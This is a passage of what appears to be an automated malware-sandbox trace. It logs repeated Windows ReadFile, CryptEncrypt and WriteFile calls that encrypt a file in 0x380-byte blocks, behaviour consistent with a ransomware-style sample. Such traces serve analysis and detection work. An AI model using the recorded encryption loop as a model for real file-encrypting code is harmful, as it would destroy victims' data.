lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.946] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.946] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.946] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.946] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.947] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.947] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.947] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.947] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.947] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.947] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.947] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.948] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.948] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.948] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.948] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.948] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.948] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.948] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.949] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.949] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.949] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.949] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.949] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.949] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.949] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.950] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.950] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.950] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.950] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.950] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.950] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.950] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.950] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.951] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.951] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.951] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.951] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, 